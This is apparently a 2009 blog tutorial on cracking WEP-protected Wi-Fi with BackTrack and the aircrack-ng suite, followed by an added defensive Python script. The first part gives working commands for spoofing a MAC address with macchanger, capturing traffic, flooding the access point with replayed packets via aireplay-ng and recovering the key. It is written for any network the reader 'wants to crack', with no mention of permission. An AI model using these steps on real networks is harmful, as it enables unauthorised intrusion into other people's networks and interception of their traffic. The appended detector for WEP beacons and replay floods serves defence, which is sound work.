Cracking wireless network WEP protection
October 29th, 2009
- A compatible wireless adapter: there are lots of compatible wireless adapters available, but what you need to care about is the size of your pocket, or say your budget. One can easily go for a good Alfa adapter that is easily available on Amazon, but I'll recommend going for the AirPcap adapter which I discussed in my previous thread.
However, the Alfa "AWUS036H/AWUS036H + 9dBi" will be the best option as it is considered the cheap & best choice for everyone.
- BackTrack Live CD: click here to download its DVD ISO if you don't have one in your collection. BackTrack is a popular Linux distribution basically used for penetration testing.
Boot your system using the BackTrack Live CD, then log in with the default username & password (user: root, password: toor). Once authenticated, just type startx to bring up the KDE desktop.
Launch Konsole, the built-in command line interface, and follow the steps below:
- Type airmon-ng to get a list of the available wireless network interface cards.
- Choose the one you want to use to crack the WEP encryption and type airmon-ng stop interface_name to disable its monitor mode.
- Now you need to change your MAC address to a fake one, but first make sure your card is disabled; you can disable your interface card with the command ifconfig interface_name down
- Now, to change your MAC address, use the command macchanger --mac 11:22:33:44:55:66 interface_name
- Restart monitor mode for this interface by running airmon-ng start interface_name
Once you have successfully faked your MAC address you can move to the next step:
- Run airodump-ng interface_name to bring up the list of available wireless networks or access points.
- Note down the BSSID, channel number (CH) & ESSID of the network whose WEP encryption you want to crack.
- Now we need to capture all the packets to a file; type airodump-ng -c (Channel_Number) -w (file_name) --bssid (BSSID) interface_name
- Run aireplay-ng -1 0 -a (BSSID) -h 11:22:33:44:55:66 -e (ESSID) interface_name
- Now run aireplay-ng -3 -b (BSSID) -h 11:22:33:44:55:66 interface_name
The above command will create a huge amount of traffic and consume more memory and processor time; just sit back and watch the number in the #Data column.
Once you have received more than 10000 data packets, it's time for the final countdown.
Open a new console window and run the command below:
aircrack-ng -b (BSSID) file_name-01.cap
This final command should print the WEP key; if somehow it didn't, you may need to collect more data packets to let aircrack-ng complete successfully.
- interface_name refers to the name of your wireless interface (e.g. wth0/eth0)
- BSSID refers to the BSSID of the wireless network
- Channel Number refers to the channel number of the wireless network
- ESSID refers to the name or SSID of the wireless network
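From the defender's side, the two things worth spotting in the walkthrough above are the weak setting itself (an access point still beaconing WEP) and the replay step, which re-sends one captured frame, and therefore one unchanging WEP IV, hundreds of times a second to pump the #Data counter. The Python below is an added illustration, not part of the original post or of the aircrack-ng suite; the record layout and all frames are constructed for the example.

```python
from collections import defaultdict

# Constructed sample records (not a real capture). Each tuple is
# (time_s, bssid, source_mac, kind, info): for a "beacon" the info field is
# the advertised cipher, for a "data" frame it is the 3-byte WEP IV in hex.
SAMPLE = [
    (0.0, "AA:BB:CC:DD:EE:01", "AA:BB:CC:DD:EE:01", "beacon", "WEP"),
    (0.1, "AA:BB:CC:DD:EE:02", "AA:BB:CC:DD:EE:02", "beacon", "WPA2"),
    # A legitimate WEP station: the IV changes on every frame.
    (0.2, "AA:BB:CC:DD:EE:01", "00:11:22:33:44:01", "data", "3c9a01"),
    (0.3, "AA:BB:CC:DD:EE:01", "00:11:22:33:44:01", "data", "3c9a02"),
]
# Replay flood: the same frame (same IV) re-sent 200 times within one second
# from the spoofed MAC used in the walkthrough.
SAMPLE += [(1.0 + i * 0.005, "AA:BB:CC:DD:EE:01", "11:22:33:44:55:66",
            "data", "7f0e11") for i in range(200)]


def wep_networks(frames):
    """BSSIDs whose beacons still advertise WEP: the setting to migrate off."""
    return sorted({bssid for _, bssid, _, kind, info in frames
                   if kind == "beacon" and info == "WEP"})


def replay_suspects(frames, window_s=1.0, threshold=100):
    """Map (bssid, source_mac) -> peak count of frames carrying one identical
    IV inside any `window_s` window, for counts above `threshold`.  A normal
    WEP station increments its IV per frame, so a hot, unchanging IV from one
    MAC is the signature of an injected replay rather than real traffic."""
    by_key = defaultdict(list)
    for t, bssid, src, kind, info in frames:
        if kind == "data":
            by_key[(bssid, src, info)].append(t)
    suspects = {}
    for (bssid, src, _iv), times in by_key.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over timestamps
            while times[end] - times[start] > window_s:
                start += 1
            count = end - start + 1
            if count > threshold:
                suspects[(bssid, src)] = max(suspects.get((bssid, src), 0), count)
    return suspects


if __name__ == "__main__":
    print("WEP networks:", wep_networks(SAMPLE))
    print("Replay suspects:", replay_suspects(SAMPLE))
```

Feeding real frames in means pulling the privacy bit and cipher from beacons and the first three bytes of the WEP header from data frames; the thresholds above are illustrative and should be tuned against a baseline of the site's normal traffic.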
Click the link for more information on Alfa AWUS036H or AWUS036H+9dBi